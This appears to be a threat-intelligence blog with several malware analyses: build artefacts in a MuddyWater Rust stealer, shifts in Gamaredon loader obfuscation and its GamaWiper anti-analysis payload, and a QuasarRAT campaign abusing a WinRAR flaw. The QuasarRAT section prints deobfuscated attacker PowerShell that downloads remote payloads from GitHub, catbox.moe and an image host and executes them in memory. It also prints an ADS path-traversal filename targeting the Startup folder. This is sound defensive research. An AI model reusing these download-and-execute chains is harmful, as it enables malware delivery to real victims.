I grabbed a sample attributed to MuddyWater (hash: "f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f", sample from here) and originally planned to do a fairly standard malware analysis.

That plan lasted about five minutes.

What started as a normal sample quickly turned into something much more interesting for me:
the developer didn’t properly strip the binary and left behind a lot of build artefacts, enough to sketch a pretty solid profile of the development toolchain behind this malware.

In this post I won’t go into a full behavioral or functional analysis of the payload itself.
Instead, I’ll focus on what we can learn purely from the developers mistakes, what kind of profile we can derive from them and how this information can be useful for clustering and campaign tracking.
A more traditional malware analysis of this sample will follow in a future post.

Quick Context: Who Is MuddyWater Anyway?

Before going any further, a quick bit of context on MuddyWater, because this part actually matters for what follows.

MuddyWater is a long-running Iranian threat actor commonly associated with the Iranian Ministry of Intelligence and Security (MOIS). The group is primarily known for espionage-driven operations targeting government institutions, critical infrastructure, telecommunications and various organizations across the Middle East and parts of Europe.

This is not some random crimeware operator copy-pasting loaders from GitHub like script kiddies.
We’re talking about a mature, state-aligned actor with a long operational history and a fairly diverse malware toolkit.

Which is exactly why the amount of build and development artefacts left in this sample is so interesting.


The initial sample is a .doc file.
Honestly, nothing fancy just a Word document with a macro that reconstructs an EXE from hex, writes it to disk and executes it. Classic stuff.

I started with oleid:

oleid f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

As expected, the document contains VBA macros, so next step:

olevba --analysis f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc

Clearly malicious. No surprises here.
To get a closer look at the macro itself, I exported it using:

olevba -c f38a56b8dc0e8a581999621eef65ef497f0ac0d35e953bd94335926f00e9464f.doc > makro.vba

Now we can see the actual macro code:

Apart from some typos and random variable names, most of this is just junk code.
What actually happens is pretty straightforward:

  • WriteHexToFile takes a hex string from UserForm1.TextBox1.Text, converts it to bytes and writes it to:
    C:\ProgramData\CertificationKit.ini
  • love_me__ constructs the following command from ASCII values:
99 109 100 46 101 120 101 = cmd.exe
32 47 99 32 = /c
67 58 92 80 114 111 + "gramData\CertificationKit.ini"
= C:\ProgramData\CertificationKit.ini

Final result:

cmd.exe /c C:\ProgramData\CertificationKit.ini

While the payload shows a clear shift towards modern Rust-based tooling, the document dropper still relies on “obfuscation” techniques that wouldn’t look out of place in early 2000s VBA malware. Turning strings into ASCII integers and adding unreachable trigonometric conditions mostly just makes human analysts roll their eyes. It provides essentially zero resistance against automated analysis, but hey, let’s move on.


Extracting the Payload

To extract the binary cleanly, I wrote a small Python script:

CLICK TO OPEN
# Author: Robin Dos 
# Created: 10.01.2025
# This scripts extracts binary from a muddywater vba makro

#!/usr/bin/env python3
import re
import sys
from pathlib import Path
import olefile

DOC = Path(sys.argv[1])
OUT = Path(sys.argv[2]) if len(sys.argv) > 2 else Path("payload.bin")

STREAM = "Macros/UserForm1/o"

def main():
    if not DOC.exists():
        raise SystemExit(f"File not found: {DOC}")

    ole = olefile.OleFileIO(str(DOC))
    try:
        if not ole.exists(STREAM.split("/")):
            # list streams for troubleshooting
            print("stream not found. Available streams:")
            for s in ole.listdir(streams=True, storages=False):
                print("    " + "/".join(s))
            raise SystemExit(1)

        data = ole.openstream(STREAM.split("/")).read()
    finally:
        ole.close()

    # Extract long hex runs
    hex_candidates = re.findall(rb"(?:[0-9A-Fa-f]{2}){200,}", data)
    if not hex_candidates:
        raise SystemExit("[!] No large hex blob found in the form stream.")

    hex_blob = max(hex_candidates, key=len)
    # clean (jic) and convert
    hex_blob = re.sub(rb"[^0-9A-Fa-f]", b"", hex_blob)

    payload = bytes.fromhex(hex_blob.decode("ascii"))
    OUT.write_bytes(payload)

    print(f"wrote {len(payload)} bytes to: {OUT}")
    print(f"first 2 bytes: {payload[:2]!r} (expect b'MZ' for PE)")

if __name__ == "__main__":
    main()

In the end I get a proper PE32+ executable, which we can now analyze further.

SHA256 of the extracted payload:

7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

If we check the hash on VirusTotal, we can see that the file is already known, but only very recently:

We also get multiple attributions pointing toward MuddyWater:

So far, nothing controversial, this is a MuddyWater RustyStealer Sample as we’ve already seen before.


Build Artefacts: Where Things Get Interesting

Now that we have the final payload, I loaded it into Ghidra.
First thing I always check: strings.

And immediately something interesting pops up:

The binary was clearly not properly stripped and contains a large amount of leftover build artefacts.
Most notably, we can see the username “Jacob” in multiple build paths.

No, this does not automatically mean the developers real name is Jacob.
But it does mean that the build environment uses an account named Jacob and that alone is already useful for clustering.

I went through all remaining artefacts and summarized the most interesting findings and what they tell us about the developer and their environment.

Operating System

Windows

Evidence:

C:\Users\Jacob\...
C:\Users\...\rustup\toolchains\...
windows-registry crate
schannel TLS

This was built natively on Windows.
No Linux cross-compile involved.

Programming Language & Toolchain

Rust (MSVC Toolchain)

Evidence:

stable-x86_64-pc-windows-msvc
.cargo\registry
.rustup\toolchains

Target Triple:
x86_64-pc-windows-msvc

This is actually quite useful information, because many malware authors either:

  • build on Linux and cross-compile for Windows or
  • use the GNU toolchain on Windows

Here we’re looking at a real Windows dev host with Visual C++ build tools installed

Username in Build Paths

C:\Users\Jacob\

Again, not proof of identity, but a very strong clustering indicator.
If this path shows up again in other samples, you can (confidently) link them to the same build environment or toolchain.

Build Quality & OPSEC Trade-Offs

The binary contains:

  • panic strings
  • assertion messages
  • full source paths

Examples:

  • assertion failed: ...
  • internal error inside hyper...

Which suggests:

  • no panic = abort
  • no aggressive stripping
  • no serious release hardening focused on OPSEC

development speed and convenience clearly won over build sanitization

Which is honestly pretty typical for APT tooling, but this is still very sloppy ngl

Dependency Stack & Framework Fingerprint

Crates and versions found in the binary:

  • atomic-waker-1.1.2
  • base64-0.22.1
  • bytes-1.10.1
  • cipher-0.4.4
  • ctr-0.9.2
  • futures-channel-0.3.31
  • futures-core-0.3.31
  • futures-util-0.3.31
  • generic-array-0.14.7
  • h2-0.4.12
  • hashbrown-0.15.5
  • http-1.3.1
  • httparse-1.10.1
  • http-body-util-0.1.3
  • hyper-1.7.0
  • hyper-tls-0.6.0
  • hyper-util-0.1.16
  • icu_normalizer-2.0.0
  • idna-1.1.0
  • indexmap-2.11.0
  • ipnet-2.11.0
  • iri-string-0.7.8
  • mio-1.0.4
  • percent-encoding-2.3.2
  • rand-0.6.5
  • reqwest-0.12.23
  • smallvec-1.15.1
  • socket2-0.6.0
  • tokio-1.47.1
  • tower-0.5.2
  • universal-hash-0.5.1
  • url-2.5.7
  • utf8_iter-1.0.4
  • want-0.3.1
  • windows-registry-0.5.3

What information we can extract from this:

Network Stack

  • Async HTTP client (reqwest)
  • Full hyper stack (hyper, hyper-util, http, httparse)
  • HTTP/1.1 and HTTP/2 support (h2)
  • TLS via Windows Schannel (hyper-tls)
  • Low-level socket handling (socket2, mio)

So this is very clearly not basic WinInet abuse or some minimal dl logic
It’s somehwat a full-featured HTTP client stack assembled from modern Rust networking libs, with proper async handling.

Looks much more like a persistent implant than a simple one-shot loader.

Async Runtime

  • tokio
  • futures-*
  • atomic-waker

This strongly suggests an event-driven design with concurrent tasks, typical for beaconing, task polling and long-running background activity.

Not what you would expect from a disposable stage loader.

Crypto

  • cipher
  • ctr
  • universal-hash
  • generic-array
  • plus base64

Active use of AEAD-style primitives, very likely AES-GCM or something close to it.

Which looks for me like:

  • encrypted embedded configuration
  • and/or encrypted C2 communication

Either way, encryption is clearly part of the design

rustc-demangle

Also one telling artefact is the presence of source paths from the rustc-demangle crate, including references to .llvm./rust/deps/.../src/lib.rs

These are build-time paths leaking straight out of the developers Cargo environment. In my opinion this means that panic handling and backtrace support were left enabled, instead of using an aggressive panic=abort and stripping strategy.

Local Development Environment

Paths like:

.cargo\registry\src\index.crates.io-1949cf8c6b5b557f\

Indicate:

  • standard Cargo cache layout
  • no Docker build
  • no CI/CD path patterns

This was almost certainly built locally on the developers Windows workstation or VM.
Just someone hitting cargo build on their dev box.
Relatable, honestly

Compiler Version (Indirectly)

Multiple references to:

/rustc/ded5c06cf21d2b93bffd5d884aa6e96934ee4234/

This is the Rust compiler commit hash.

That allows fairly accurate mapping to a Rust release version
(very likely around Rust 1.92.0)

Which is extremely useful for:

  • temporal analysis of campaigns
  • toolchain reuse detection
Internal Project Structure (More Dev Leaks)
src\main.rs
src\modules\persist.rs
src\modules\interface.rs

That tells us a lot:

Modular Architecture
  • persist > persistence module
  • interface > C2 interface or command handling

This is not just a single-purpose loader
This is a modular implant much closer to a full backdoor framework than a simple dropper.


What This Tells Us About the Developer & Operation

Technical Profile

  • Rust developer
  • works on Windows
  • uses MSVC toolchain
  • builds locally, not via CI
  • comfortable with async networking
  • understands TLS and proxy handling

Operational Assumptions

  • expects EDR solutions (found a lot of AV related strings, but not to relevant tbh)
  • expects proxy environments
  • targets corporate networks
  • uses modular architecture for flexibility

OPSEC Choices

  • prioritizes development speed
  • does not heavily sanitize builds
  • accepts leakage of build artefacts (LOL)

Which again fits very well with how many state aligned toolchains are developed:
fast iteration, internal use and limited concern about reverse-engineering friction

From a threat hunting perspective, these artefacts are far more useful than yet another short-lived C2 domain, they allow us to track the toolchain, not just the infrastructure

What Build Artifacts Reveal About Actor Development

Build artifacts embedded in operational malware are more than just accidental leaks they offer a look into an actors internal development maturity.
Exposed compiler paths, usernames, project directories or debug strings strongly suggest the absence of a hardened release pipeline.
In mature development environments, build systems are typically isolated, stripped of identifiable metadata and designed to produce reproducible, sanitized artifacts.
When these indicators repeatedly appear in live payloads, it points to ad-hoc or poorly automated build processes rather than a structured CI/CD workflow
The continued presence of build artifacts across multiple campaigns is particularly telling.
It indicates not just a single operational mistake, but a lack of learning or feedback integration over time. Actors that actively monitor public reporting and adapt their tooling usually remediate these issues quickly.
Those that do not reveal organizational constraints, limited quality assurance or sustained time pressure within their development cycle.
I’ll start to do some more research about MuddyWater in the next few weeks to get a better understanding weather this was a single incident or a general problem in MuddyWaters development process.
Leaving build artefacts in your malware is rarely about “oops, forgot to strip the binary”
It’s more a side effect of how development, testing and deployment are glued together inside the operation.
From a defenders POV, that’s actually way more useful than yet another throwaway C2 domain / IP.
These artefacts don’t rotate every week they give you fingerprints that can survive multiple campaigns.

Gamaredon: Same Goal, Fewer Fingerprints


by Robin Dost

In malware analysis, it is tempting to describe change as innovation.
New tricks, new tooling, new malware families.
What is far more revealing, however, is how little actually changes and what changes anyway.

Between late November and the end of December 2025, several Gamaredon-related VBScript loaders surfaced that are, functionally, almost identical. They all execute the same mechanism, rely on the same execution primitive, and ultimately aim for the same outcome.

And yet, something does change, quietly, incrementally, and very deliberately.

This article focuses strictly on observable, concrete shifts in obfuscation, not assumptions, not intent inferred from tooling, and not architectural leaps that are not supported by the samples themselves.

For this analysis, I used the following samples:

Date of SampleHashDownload
19.12.20256de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0aDownload
22.12.20259218528a40a48a3c96df3b49a7498f6ea2a961f43249081b17880709f73392c1Download
25.12.20252c69fd052bfaa03cd0e956af0f638f82bc53f23ee8d0c273e688e257dac8c550Download
30.12.2025846748912aa6e86b9d11f6779af6aae26b7258f8610d5e28eff0083779737824Download


25 November 2025 – Noise Without Structure

The earliest sample is dominated by volume.

Characteristics:

  • Hundreds of variables that are written to once and never read again
  • Repeated arithmetic mutations (x = x + 14) without semantic relevance
  • Long linear execution flow
  • No variable declarations (Dim entirely absent)

The obfuscation here serves one purpose only: syntactic noise.

There is no attempt to:

  • Hide control flow
  • Delay string resolution
  • Reconstruct logic conditionally

Everything is present in the source, just buried under irrelevant assignments.

From an analyst’s perspective, this sample is noisy but predictable.
Once dead code is ignored, execution logic collapses into a short, linear sequence.


19 December 2025 – Indicator overload

The mid-December sample introduces a clear and measurable change: indicator density.

New observations:

  • A significant increase in hard-coded URLs
  • URLs pointing to unrelated, legitimate, and state-adjacent domains
  • No execution dependency on most of these URLs

Crucially, these URLs are not obfuscated. They are placed in plain sight.

This is not string hiding it is indicator flooding.

The obfuscation shift here is not technical complexity, but analytical friction:

  • Automated extraction produces dozens of false leads
  • IOC-based clustering becomes unreliable
  • Manual triage cost increases without changing execution logic

The loader still behaves linearly. What changes is the signal-to-noise ratio.


22 December 2025 – Defensive Reaction at the Payload Layer

The December 22 sample is not an obfuscation milestone, but it is a defensive one.

From a loader perspective, almost nothing changes:

  • The download URL is fully present and statically recoverable
  • No additional string hiding or control-flow manipulation is introduced
  • Execution remains linear and transparent

However, focusing solely on loader complexity misses the actual shift.

The real change happens at the payload layer

For the first time in this series, the loader delivers GamaWiper instead of Pterodo for Analysis environments.

This is not a neutral substitution.

As outlined in my earlier analysis of GamaWipers behavior, this payload is explicitly designed to:

In other words:
Gamaredon reacts defensively, just not in the loader yet.

Why obfuscation does not increase here

The absence of additional loader obfuscation is not a contradiction, but a signal.

At this stage:

  • The defensive burden is shifted entirely onto the payload
  • The loader acts as a transparent delivery mechanism
  • Analysis deterrence is achieved through destructive behavior, not concealment

This suggests a deliberate sequencing:

  1. Introduce a hostile payload to counter analysis
  2. Observe detection and response
  3. Only then begin hardening the delivery mechanism itself

Why this sample matters

~ December 22 marks the point where Gamaredon stops merely being observed and starts actively responding.

Not by hiding better, but by ensuring that seeing the payload has consequences.

The subsequent increase in loader obfuscation after this date does not replace this strategy.
It complements it.

Payload hostility first.
Delivery hardening second.

Notably, this change occurs almost exactly four weeks after my article outlining practical approaches to tracking Gamaredon infrastructure went public.
Whether coincidence or feedback loop, the timing aligns remarkably well with the first observed deployment of GamaWiper as an anti-analysis response.


25 December 2025 – Control-Flow Noise Appears

The Christmas sample does not introduce new primitives, but it does introduce execution ambiguity.

Concrete changes:

  • Multiple .Run invocations exist
  • Not all of them result in meaningful execution
  • Several objects and variables are constructed but never used
  • Execution order is less visually obvious

This is not branching logic, but control-flow camouflage.

The analyst can still reconstruct execution, but:

  • Dead paths look plausible
  • Execution sinks are no longer unique
  • Automated heuristics struggle to identify the real one

The obfuscation no longer targets strings, it targets execution clarity.


30 December 2025 – Fragmented Runtime Assembly

The final sample introduces the most tangible structural changes.

Observed differences:

  • Systematic use of Dim declarations
  • Extensive use of short, non-semantic string fragments
  • Assembly of execution-relevant strings via repeated concatenation across distant code sections
  • No complete execution string exists statically
  • Domains are just random invalid Domains

At no point does the full execution command exist as a contiguous value in the source.

Instead:

  • Fragments are combined
  • Recombined
  • Passed through intermediate variables
  • Finalized immediately before execution

This directly degrades:

  • Static string extraction
  • Signature-based detection
  • Regex-driven tooling

No encryption is added.
The shift is purely architectural.


05 January 2026 – Added Datetime Parameter to URL

EDIT 07.01.2026: I added this part as new findings appeared

Since early January, another small but relevant change appeared in the loader logic.

The scripts now generate a date value at runtime:

This value is then embedded directly into the download path, resulting in URLs like:

.../UkrNet_02.01.2026/cutting/02.01.2026/hannah8342.pdf

From a detection standpoint, this is subtle but effective

This means:

  • payload paths change daily
  • static URL signatures age out immediately
  • and IOC reuse across campaigns becomes unreliable

Relation to Prior Observations

This behavior aligns closely with patterns discussed in my earlier article on GamaWiper and Gamaredon’s anti-analysis strategies, where delivery behavior adapts based on perceived execution context.

https://blog.synapticsystems.de/gamawiper-explained-gamaredon-anti-analysis/


What Actually Changed and What Did Not

What did not change:

  • Execution primitive
  • Loader purpose
  • Overall delivery mechanism

What did change:

  • When execution-relevant strings become complete
  • How many false execution paths exist
  • How much irrelevant context surrounds the real logic

This is not a rewrite.
It is iterative hardening.


Conclusion

These samples do not demonstrate innovation.
They demonstrate attention.

Each iteration removes one assumption analysts rely on:

  • “The string will exist somewhere”
  • “The execution path is obvious”
  • “Dead code looks dead”

Gamaredon did not add complexity for its own sake.
They added just enough friction to slow analysis and then stopped.

And that restraint is, in itself, the most telling signal.

GamaWiper Explained: Gamaredon’s “New” Anti-Analysis Weapon


by Robin Dost

After my recent blog posts covering Gamaredon’s ongoing PterodoGraph campaign targeting Ukraine, and following almost a full month of silence in terms of newly observed malware samples, fresh activity has finally resurfaced.

New samples have appeared, along with reports pointing to a component now referred to as GamaWiper.

It is important to note that GamaWiper, or at least very similar scripts has already been observed in Gamaredon operations in previous months.
From a purely technical standpoint, this functionality is therefore not entirely new.

What is new, however, is the context in which it is now being deployed.

In this article, I aim to shed some light on what GamaWiper actually is, why Gamaredon is actively delivering it at this stage of the infection chain, and what this shift tells us about the group’s current operational mindset.
What initially appears to be just another destructive payload instead turns out to be a deliberate control mechanism, one that decides who receives the real malware and who gets wiped instead

I’ll keep this post a bit shorter and focus only on what’s new, so it doesnt get boring.
If you’re looking for deeper technical details, please refer to my previous posts from 22.11.2025 and 13.11.2025, where I covered the core mechanics in depth.

For this analysis, I’m using my deobfuscated version of the sample, next time i’ll maybe show you how to deobfuscate Gamaredon Scripts manually in less then 10 minutes.

After downloading the latest Gamaredon malware sample, it immediately became obvious that the current variants differ noticeably from what we’ve seen before.

SHA256: 6de9f436ba393744a3966b35ea2254dde2f84f5b796c6f7bee4b67ccf96ccf0a

Note: I started writing YARA Rules for Gamaredons current samples, you can find them here.


Key Changes at a Glance

  • Junk URLs now closely resemble real payload delivery URLs
  • No full Pterodo payload is delivered anymore 🙁
  • Gamaredon has hardened the delivery of Pterodo samples

Infection Flow – What Changed?

After the user opens the RAR archive and infects their system, the behavior initially looks familiar.
On reboot, the Pterodo sample is fetched again, but only if the client is geolocated in Ukraine, as already mentioned in my previous blog posts.

Previously, non-UA clients would simply receive:

  • an empty page, or
  • an empty file

Today, however, things look a bit different.

Instead, the client receives GamaWiper.


GamaWiper – Sandbox? Gone.

GamaWiper is essentially a sandbox / VM killer whose sole purpose is to prevent analysis environments from seeing anything useful.

In earlier campaigns, this wasn’t always handled very well.
For example, when I used Hybrid-Analysis, it was trivial to extract:

  • Telegram channels
  • Graph URLs
  • infrastructure relationships

This was a classic infrastructure design flaw and a great example of what budget cuts can do to an APT operation 😄

Today, however, the approach is much simpler:

If a sandbox is detected -> wipe it

No telemetry, no infrastructure leaks, no fun.

If you are a doing legit malware research interested in (deobfuscated) Samples from Gamaredon, you can write me an email.


Initial Loader: “GamaLoad”

The initial loader, which I’ll refer to as GamaLoad, implements a multi-stage payload fetch mechanism with dynamically constructed URLs and headers.
The goal is resilience: fetch stage two no matter what.

Note: All malicious domains have been removed.


Request Characteristics

Request Type

  • Method: GET
  • Client: msxml2.xmlhttp
  • Execution: synchronous

URL Structure

Each request fetches a randomly generated resource:

/<random>.<ext>
  • Random filename: 7-10 characters (a-z, 0-9)
  • Camouflage extensions, e.g.:
    • wmv
    • yuv
    • lgc
    • rm
    • jpeg

C2 Fallback Order

The script iterates through multiple sources until a valid payload is received:

  1. Argument URL (if passed at execution)
  2. Hardcoded fallback
  3. Cloudflare Workers domain
  4. Domain fetch using @ notation
  5. Abuse of the URL userinfo field
  6. Dynamic host via check-host.net
    • HTML parsing
    • live host extraction
  7. Alternative domain (again using @ notation)
  8. Registry-based URL

Once a working C2 is found, it is stored as a persistent C2 entry.


HTTP Headers

The request uses very explicit and intentionally crafted headers.

User-Agent

A browser-like string combined with a host fingerprint, including:

  • Computer name
  • Drive serial number (hex-encoded)
  • Timestamp
    • UTC+2
    • Ukrainian local time expected

Cookie

  • Static campaign identifier
  • Rotates regularly (more on that below)

Content-Length

  • Explicitly set
  • Even for GET requests

Enables victim identification & tracking
Also plays a role in proxy evasion (see below)


Success Condition

A request is considered successful when:

  • HTTP status is 200
  • Response size is greater than 91 bytes

Once this condition is met, all remaining fallbacks are skipped.


Payload Processing

  1. Payload received as binary
  2. UTF-8 conversion
  3. Cleanup (CR/LF, delimiters)
  4. Base64 decoding
  5. In-memory execution

No disk writes – classic fileless execution


Evasion Techniques

  • Multi-stage fallback logic
  • Dynamic hosts
  • Delays between requests
  • Victim-specific User-Agent

Below is an example of a fully constructed request header sent to the payload delivery host.


Payload Rotation

Gamaredon currently rotates payloads every 1-3 hours.

With each rotation, the following variables may change:

  • Domains for Payload Delivery
  • User-Agent
  • Cookie
  • Content-Length

Why Is Content-Length Set?

The Content-Length HTTP header specifies the size of the request or response body in bytes.
Its typical purpose is:

  • Defining message boundaries
  • Preventing truncated reads
  • Enabling correct stream handling

In this case, however, I strongly believe the header is set intentionally for tracking and proxy evasion.

Why?

The loader uses msxml2.xmlhttp.
When calling .send() via this client, the Content-Length header is not overwritten.

For a normal residential client, this is usually not an issue.
However, many HTTP/HTTPS proxies, especially residential and chained proxies fail to handle this properly and may:

  • break the connection
  • modify the request
  • normalize headers

This behavior is highly detectable.

My conclusion:
Gamaredon likely uses this mechanism to filter out proxy-based analysis setups.
The choice of client and header behavior is far too specific to be accidental.

So, if you end up receiving GamaWiper instead of a payload, now you know why.


Conclusion

Gamaredon has clearly tightened its operational security.

The infrastructure flaws that previously allowed easy extraction of internal details have been addressed, and sandbox detection has shifted from “leaky but useful” to “wipe and move on”.

While these changes will certainly disrupt some tracking and automated analysis systems, the overall approach feels… let’s say pragmatic, but somewhat heavy-handed.

Effective?
Yes.

Elegant?
Debatable 😄


QuasarRAT Malware Campaign using CVE-2025-6218


I am currently analyzing the recent surge of malware samples exploiting the WinRAR vulnerability CVE-2025-6218. During this research, I found a new sample on abuse.ch which appears to be part of a small QuasarRAT malware campaign.

What is CVE-2025-6218? (Short summary for this analysis)

This vulnerability enables:

  • Remote Code Execution (RCE)
  • Manipulated NTFS Alternate Data Streams (ADS)
  • Hidden paths / directory traversal / tampered extraction metadata

The exploit relies on:

  • Specially crafted file headers
  • Unexpected or malformed filename fields in the RAR block
  • ADS payloads such as file.txt:evil.exe embedded inside the RAR structure
  • WinRAR linking the ADS → extracting it → and executing the resulting file automatically

The SHA256 hash of the file is:

c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f
You can download the file here.

After extracting the outer archive, we obtain another RAR file. Before unpacking it, we take a look at its contents in the hex view to check for anything suspicious.

xxd c67cc833d079aa60d662e2d5005b64340bb32f3b2f7d26e901ac0b1b33492f2f.rar| less

We can already see the suspicious ADS payload inside the RAR block.
With this confirmation, we proceed to extract the archive using 7-Zip.

After extraction, we obtain two files:

Coinme.py.txt
'Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs'

The file Coin.me.py.txt contains a simple Python script that queries email addresses of coinme.com users.
You can find the script here.

Now we get to the interesting part — the file:

Coinme.py.txt:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_0fyhds341.vbs

It contains a short Visual Basic script:

The script downloads an HTML Application (HTA) file from a GitHub repository.
At the time of writing, both the repository and the user account have already been deleted. However, I uploaded a backup of the user’s repositories here.

Here is a screenshot of the repository and the associated profile:

Interestingly, the account only follows one inactive user with the Username “Levbohol / лев” :


Next, I inspected the verification.hta file that was downloaded from the repository.

The file contains a lightly obfuscated HTA script. I decoded the fromCharCode array into ASCII, resulting in the following code:

conhost.exe --headless cmd.exe /c powershell.exe -w h -ep bypass -c "
$t=Join-Path $env:TEMP 'svchost.bat'; 
Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/Proscaution32/tessttxd312/refs/heads/main/ilovelovelove.txt' -OutFile $t -UseBasicParsing;
if(Test-Path $t){
    & conhost.exe --headless cmd.exe /c $t
}"

The script downloads yet another file named ilovelovelove.txt and executes it.
Let’s take a closer look at that text file.

We are now looking at a heavily obfuscated DOS batch file. The first things that stand out are numerous variable assignments using set ... and comments prefixed with the REM keyword.

The comments are merely junk intended to distract the analyst.
The variable assignments, however, are more complicated.

Some of the variables are never used anywhere in the script, these are clearly junk statements meant to confuse the reader.
Other variables are used during execution and must be isolated and replaced with their actual runtime values.
We also encounter various uninitialized variables, which are also junk, since they never carry a value.

Before proceeding, I remove all comments from the file.

sed -i '/^[Rr][Ee][Mm]/d' ilovelovelove.txt 

Next, I isolate all variables that can be identified as junk, meaning variables that are referenced but never assigned a value.

grep -oE '%[^%]+%' ilovelovelove.txt > isolated_set_commands.txt
while read -r line; 
  do x=$(echo "$line" | sed 's/%//g'); res="$(grep $x ilovelovelove.txt | wc -l)"
  if [ $res -lt 2 ]; 
    then echo "$line"; 
  fi
done < isolated_set_commands.txt >> removable.txt
rm isolated_set_commands.txt

I then remove all uninitialized variables from the script completely.

while read -r line; do sed -i "s|$line||g" ilovelovelove.txt; done < removable.txt 

The script is now much cleaner, but some junk variables still remain. These were not properly filtered out because they were detected as variable placeholders inside strings.
To handle this, we isolate them and remove any variable that does not have a corresponding set assignment.

I also found many Base64 strings in the script, but none of them appear to form recognizable structures at this point, so we ignore them for now.
Next, we replace every remaining variable with its assigned value.

For this purpose, I wrote a small helper script:

#!/bin/bash
grep -oE '%[^%]+%' ilovelovelove_copy.txt > usable.txt

while read -r line; do 
    fstr="$(echo $line | sed 's/%//g')"
    x=$(grep "set $fstr" ilovelovelove_copy.txt | wc -l)


    if [ $x -lt 1 ]; then
        sed -i "s|$line||g" ilovelovelove_copy.txt 
        continue
    fi

    value=$(grep "set $fstr" ilovelovelove_copy.txt | cut -d'=' -f2 )
    echo "$line $value"
    clean_line=$(echo -n "$line")
    clean_value=$(echo -n "$value")
    sed -i "s|$clean_line|$clean_value|g" ilovelovelove_copy.txt
done < usable.txt

After running the helper script, the cleaned batch script now looks like this:

After removing all ^M carriage returns, we obtain the following finalized version:

>> Click to open script <<

start conhost.exe --headless powershell.exe -ep bypass -w h -NoExit -c "
$Ab1CdE t-CimInstance -Namespace 'rootSecurityCenter2' -ClassName AntiVirusProduct -ErrorAction SilentlyContinue;
$fGh2IjK $false;

if ($Ab1CdE) {
    foreach ($Lm3NoP in $Ab1CdE) {
        $Qr4StU $Lm3NoP.displayName;

        if ($Qr4StU -like '*ESET Security*') {
            $Vw5XyZ 'https://files.catbox.moe/4q6yuz.txt';
            $Ab6CdE-Object System.Net.WebClient;;
            $Ab6CdE.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;
            $Ef7GhI b6CdE.DownloadString($Vw5XyZ);;
            $Ab6CdE.Dispose();;

            $u  ('From'+'Base64'+'String');
            $Ij8KlM System.Convert].GetMethod($u).Invoke($null, @([string]$Ef7GhI));
            $No9PqR System.Text.Encoding]::UTF8.GetString($Ij8KlM);

            Invoke-Expression $No9PqR;
            $fGh2IjK rue;
            break;
        };

        if ($Qr4StU -like '*Malwarebytes*' -or $Qr4StU -like '*F-Secure*') {
            $St0UvW https://files.catbox.moe/qt6070.txt';
            $Xy1ZaB ew-Object System.Net.WebClient;;
            $Xy1ZaB.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;
            $Cd2EfG $Xy1ZaB.DownloadString($St0UvW);;
            $Xy1ZaB.Dispose();;

            $u  'From'+'Base64'+'String');
            $Gh3IjK  [System.Convert].GetMethod($u).Invoke($null, @([string]$Cd2EfG));
            $Lm4NoP  [System.Text.Encoding]::UTF8.GetString($Gh3IjK);

            Invoke-Expression $Lm4NoP;
            $fGh2IjK $true;
            break;
        };
    };
};

Add-Type -AssemblyName System.Drawing, System.IO.Compression.FileSystem;;

$Qr5StU 'https://i.ibb.co.com/NfC1jKn/yu42mu5xn.png';;
$Vw6XyZ-Object System.Net.WebClient;;
$Vw6XyZ.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36');;

$Ab7CdE $Vw6XyZ.DownloadData($Qr5StU);;
$Vw6XyZ.Dispose();;

$Ef8GhI w-Object IO.MemoryStream(,$Ab7CdE);;
$Ij9KlM stem.Drawing.Bitmap]::FromStream($Ef8GhI);;

$No0PqR $Ij9KlM.GetPixel(0,0);;
$St1UvW $Ij9KlM.GetPixel(1,0);;

$size uint32]$No0PqR.R -shl 24) -bor ([uint32]$No0PqR.G -shl 16) -bor ([uint32]$No0PqR.B -shl 8) -bor [uint32]$St1UvW.R;

$Xy2ZaB w-Object System.Collections.Generic.List[byte];

for ($y; $y -lt $Ij9KlM.Height; $y++) {
    for ($x; $x -lt $Ij9KlM.Width; $x++) {
        if ( ($x -eq 0 -and $y -eq 0) -or ($x -eq 1 -and $y -eq 0) ) {
            continue;
        };

        $p 9KlM.GetPixel($x,$y);;

        $Xy2ZaB.Add($p.R);;
        $Xy2ZaB.Add($p.G);;
        $Xy2ZaB.Add($p.B);;
    };
};

$Ij9KlM.Dispose();;
$Ef8GhI.Dispose();;

$Cd3EfG $Xy2ZaB.ToArray()[0..($size-1)];;

$Gh4IjK w-Object IO.MemoryStream(,$Cd3EfG);;
$Lm5NoP w-Object IO.MemoryStream;;

$Qr6StU w-Object IO.Compression.GZipStream($Gh4IjK, );;
$Qr6StU.CopyTo($Lm5NoP);;

$Qr%MknH%.Dispose();;
$Gh4IjK.Dispose();;

$Vw7XyZ $Lm5NoP.ToArray();;
$Lm5NoP.Dispose();;

foreach ($Ab8CdE in [AppDomain]::CurrentDomain.GetAssemblies()) {
    if ($Ab8CdE.GlobalAssemblyCache -and $Ab8CdE.Location.Contains('mscor'+'lib.dll')) {
        foreach ($Ef9GhI in $Ab8CdE.GetType(('System.Reflection.Assembly')).GetMethods('Public,Static')) {
            if ($Ef9GhI.ToString()[37] -eq ']') {
                $Ij0KlM 9GhI.Invoke($null,(,$Vw7XyZ));;

                $No1PqR $Ij0KlM.EntryPoint;;
                $St2UvW $No1PqR.GetParameters().Count;;

                if ($St2UvW -eq 0) {
                    $No1PqR.Invoke($null,$null);
                } else {
                    $No1PqR.Invoke($null,(,@()));
                };

                break;
            };
        };

        break;
    };
}
"

Analysis – What does the script actually do?


1. Detection of installed antivirus products

The script queries root\SecurityCenter2 via WMI to identify installed antivirus solutions.
Depending on the detected product, it downloads different Base64-encoded payloads, decodes them, and executes them in memory using Invoke-Expression.

2. Downloading a hidden payload from a PNG file

Regardless of the antivirus result, the script then downloads a PNG image from a remote URL.
